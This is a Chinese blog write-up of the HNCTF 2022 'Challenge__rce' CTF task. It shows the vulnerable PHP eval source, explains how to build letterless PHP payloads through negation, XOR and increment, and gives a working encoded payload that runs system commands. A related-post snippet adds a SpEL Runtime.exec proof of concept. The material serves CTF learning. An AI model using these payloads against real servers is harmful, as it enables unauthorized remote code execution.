[HNCTF 2022 Week1]Challenge__rce

最新推荐文章于 2024-03-10 23:49:39 发布
最新推荐文章于 2024-03-10 23:49:39 发布
阅读量958 收藏 1
点赞数
文章标签: php 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_70819573/article/details/130208029
版权
文章详细介绍了在PHP环境中如何实现无字母RCE(远程代码执行)的三种主要方法:取反、异或和自增。通过示例代码展示了如何构造payload来绕过限制,特别强调了在当前过滤条件下,自增方法的应用。同时,文章提供了一个具体的payload实例,并提到了长度限制下的解决方案。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.打开环境。

查看源码传入hint获得源码。

<?php
error_reporting(0);
if (isset($_GET['hint'])) {
    highlight_file(__FILE__);
}
if (isset($_POST['rce'])) {
    $rce = $_POST['rce'];
    if (strlen($rce) <= 120) {
        if (is_string($rce)) {
            if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-Z~\\\\]/", $rce)) {
                eval($rce);
            } else {
                echo("Are you hack me?");
            }
        } else {
            echo "I want string!";
        }
    } else {
        echo "too long!";
    }
}

无参RCE,主要方法有三种,取反,自增,异或

这里因为~和^都被过滤了,所以考虑自增。

不过先总结一下无字母RCE的常见方法及原理:

1.取反

<?php
$a=~urlencode('phpinfo');
echo $a;
$b=~urldecode($a);
echo $b;
?>

本地测试结果:

 

也就是对$a进行取反操作,形成非常规字符绕过限制,在浏览器解析的时候,再还原成原来的payload.

2.异或

valid = "1234567890!@$%^*(){}[];\'\",.<>/?-=_`~ "
​
answer = str(input("请输入进行异或构造的字符串:"))
​
tmp1, tmp2 = '', ''
for c in answer:
  for i in valid:
    for j in valid:
      if (ord(i) ^ ord(j) == ord(c)):
        tmp1 += i
        tmp2 += j
        break
    else:
      continue
    break
print("tmp1为:",tmp1)
print("tmp2为:",tmp2)

 对字符串进行异或操作时,php解析时会将异或结果自动转换为字符串,以其给$_赋值,再通过拼接获取payload

3.自增

  • $_=[].''; //得到"Array"

  • $___ = $_[$__]; //得到"A",$__没有定义,默认为False也即0,此时$___="A"

由于php变量没有赋值时默认是零,且数组与字符串拼接时返回Array,由此由A自增可以得到全部26位字母通过拼接构造payload.

本地测试结果:

<?php
$a = "".[];
echo $a;
?>

结果:

而在本题,由于长度限制,所以可以构造参数,再上传参数减少长度。

payload:

rce=%24_%3D%5B%5D._%3B%24__%3D%24_%5B1%5D%3B%24_%3D%24_%5B0%5D%3B%24_%2B%2B%3B%24_1%3D%2B%2B%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D%24_1.%2B%2B%24_.%24__%3B%24_%3D_.%24_(71).%24_(69).%24_(84)%3B%24%24_%5B1%5D(%24%24_%5B2%5D)%3B%20
1=system&&2=ls /

参考文章:

无数字字母rce总结(取反、异或、自增、临时文件)

ha0cker
关注
HNCTF 2022 week1 web方向题解
m0_74160536的博客
08-01 946
简单说一下file伪协议,也是引用的别人博客(https://blog.youkuaiyun.com/qq_37466661/article/details/126203437)但正常情况下,我们输入php?filter=flag.php,只会发现一片空白,这时就需要用到php伪协议了,而这道题使用的就是file伪协议。检查-网络-刷新网页,只有两个网络响应,不过另一个是图标,不用管,打开cookie,提示去/f14g.php,跳转。打开环境,是一个小游戏,目标是2000分,不用管,小游戏题基本都是找js代码。
HNCTF 2022 Week1 web方向
konpure的博客
04-10 346
进题代码如下,直接php伪协议读取。
NSS [HNCTF 2022 Week1]Challenge__rce
Jay17的博客
09-16 759
NSS [HNCTF 2022 Week1]Challenge__rce
RFI to RCE challenge
weixin_30597269的博客
04-19 193
http://www.zixem.altervista.org/RCE/level1.php 构造payload: https://zixem.altervista.org/RCE/level1.php?page=https://raw.githubusercontent.com/pipter/SRE/master/test.php https://zixem.alte...
【misc】[HNCTF 2022 Week1]lake lake lake(JAIL) --沙盒逃逸,globals函数泄露全局变量
question55的博客
11-09 253
查看附件内容这道题的逻辑就是可以让你输入1或者2,进入各自的函数去执行功能func函数:def func(): code = input(">") if(len(code)>9): return print("you're hacker!") try: print(eval(code)) except: pass有长度限制,接着再来看backdoor函数:def backdoor(): print("Please enter the a
【PWN · ret2shellcode】[HNCTF 2022 Week1]ret2shellcode
Mr_Fmnwon的博客
04-25 5515
ret2shellcode——顾名思义,控制执行流到shellcode在更简单的一类题目ret2text中,我们主要的尝试是修改某个返回地址修改,修改到程序固有的后门函数处,劫持程序控制流以期返回后门。然而,如果程序中并不存在这样的后门函数,那么很朴素的想法是,能不能自己写一段后门函数,然后劫持程序控制流返回执行这段恶意代码呢?依此,主要的过程如下:(1)构造shellcode通过溢出放到程序某片存储空间上——为了能够执行这段代码,所存储的区域需要有可执行的权限。
CTFHub----RCE
qq_44418229的博客
06-09 629
CTFHub----RCE
[HNCTF 2022 Week1]2048
J_linnb的博客
04-21 770
2.根据题目提示:你能达到20000分吗?猜测可能需要我们玩到20000分,直接F12查看源代码。在2048.js下发现一串这个。在控制台直接输入这串代码。点击运行,flag出现。
BUUCTF crackMe
weixin_52369224的博客
11-01 878
太菜了 做了好久没做出来,参考其他师傅的解答总结一下 题目背景: 老规矩,Ex PE打开,32位无壳程序,用IDApro打开;主程序如下: 主体是一个while循环,如果我们想让while结束,我们就需要使得两个if成立; 我们首先看跟v3有关的loc_4011A0,点进去,发现无法反编译,解决办法IDA无法反编译 编译成功之后: 发现v3的值一直为1; 我们来看看sub_401830函数,主要由两个while构成,我们先来看第一个while 主要是把输入的转换成数字并且..
2022 SWPU新生赛&HNCTF web部分题目
weixin_63231007的博客
11-02 3863
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php
[HNCTF 2022 Week1] PWN 复现
Xzzzz911的博客
08-18 2397
至于payload的构造格式,就要了解64位程序的传参方式,前六个参数是通过rdi, rsi, rdx, rcx, r8, r9, 这六个寄存器,后续的参数通过栈传递,记住格式就行。首先分析一下代码,可知出现了两个buf,但是这两个buf的作用是不同的,第一个buf在bss段,这样就可以把binsh写进buf里面,然后执行system(binsh)获得flag。签到题,直接nc就行,但是这里有坑需要注意下,直接cat flag,得到的是一个假的flag,真的flag分为两部分,这点需要注意下。
RCE-远程代码执行漏洞
2301_80661529的博客
03-10 1365
远程代码执行(Remote Code Execution,RCE)是一种严重的安全漏洞,允许攻击者在目标服务器或应用程序上执行任意代码。这种漏洞的出现通常源于以下几个方面的缺陷:用户输入未经过滤或验证:当服务器端应用程序未能正确验证用户提交的数据,如HTTP请求参数、文件上传内容、数据库查询语句等,攻击者可能会将恶意代码注入到这些输入中。代码执行功能的设计缺陷:有些系统或应用提供了执行代码的接口,如PHP的函数、Java的反序列化漏洞等,若未做足够的安全防护,攻击者可通过操纵输入使得这些接口执行恶意代码。组
HNCTF 2022 Week1 easyoverflow
2301_79793667的博客
12-19 667
存在危险函数gets,填满数组v4后填充v5,当v5!=0时,自动弹出flag,所以要用变量覆写。、先进行nc连接,发现输入一些东西后会被弹出程序。检查一下附件位数,用相应位数ida打开。首先开启环境,下载附件。
2022HNCTF-web
bossDDYY的博客
10-30 3789
应该和http协议有关 想要什么 肯定flag说我们不是admin 看看cookie修改cookie继续修改 x-forwarded-for [Week1]2048 分析 题目描述你能达到20000分吗?应该是要求我们玩到20000分F12查看脚本直接输入在控制台输入 [Week1]easy_html 分析 输入框限制了11位 f12修改html属性 或者直接post参数 [Week1]Interesting_include 分析 题目描述:web手要懂得搜索 应该要借助浏览器一眼伪协议base64解码 [
HNCTF 2022-WEB部分wp
m0_74606212的博客
10-30 369
HNCTF 2022-WEB部分wp
[HNCTF 2022 Week1]超级签到
2303_79610394的博客
11-23 531
[HNCTF 2022 Week1]超级签到
[HNCTF 2022] web 刷题记录
rev1ve的博客
09-02 1380
简单分析一下,fsockopen能够使用socket与服务器进行tcp连接,并传输数据,host、port和数据都能定义,存在SSRF。这里应该是从index.php传参,ssrf然后访问到flag.php。F12查看,修改一下maxlength的值为11位。根据提示,传一个我们想要的,那就传flag咯。发现要求我们输入手机号,可是只能输10位。然后是修改cookie为admin,添加。然后随便输入11位,即可得到flag。然后让我们选择要哪个,这里发现。,然后ls看一下目录。
NSSCTF逆向刷题记录
fivesheeptree的博客
07-18 2373
得到第一位字符"N"以及flag的长度为35arr数组的长度只有34,故将i的范围改为34s = ['N']
Web】无字母/数字/参RCE相关例题wp
uuzeray的博客
11-10 1659
话说14号还有一场小比赛嘞,恰逢周末,好好整理一下贴出几篇文章一起学习。
Spel_RCE_POC.py
最新发布
04-03
### 关于 SpEL RCE 的 Python 实现 Spring Expression Language (SpEL) 是 Spring 框架中的一个重要特性,它允许开发者通过字符串表达式动态执行某些逻辑。然而,在实际应用中如果未对输入进行严格校验,则可能导致远程代码执行漏洞(RCE)。以下是有关如何构建一个简单的 PoC 脚本的说明。 #### 构建 SpEL RCE 的基本原理 攻击者可以通过构造恶意的 SpEL 表达式来触发目标服务器上的任意命令执行行为[^1]。通常情况下,这种类型的漏洞利用依赖于 HTTP 请求参数或者其它可控制的数据源注入到后台服务运行环境中去解析并执行这些危险语句。 下面展示了一个基于 `requests` 库发送请求给存在该类缺陷的应用程序实例化过程: ```python import requests url = 'http://example.com/vulnerable-endpoint' payload = { '#root': '''T(java.lang.Runtime).getRuntime().exec('touch /tmp/spel_rce_test')''' } response = requests.post(url, data=payload) if response.status_code == 200: print("Payload sent successfully.") else: print(f"Failed to send payload. Status Code: {response.status_code}") ``` 此脚本尝试向指定 URL 发送 POST 请求,并附带一个特殊设计好的键值对作为负载数据传递进去[#2]。其中的关键部分就是设置名为 "#root" 的字段内容包含了调用 Java Runtime 类方法 exec 来创建一个新的文件 "/tmp/spel_rce_test" ,以此验证是否存在权限以及能否成功实施攻击操作 [#3]. 需要注意的是上述例子仅用于学习研究目的,请勿非法测试任何未经授权的目标系统! --- ###
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值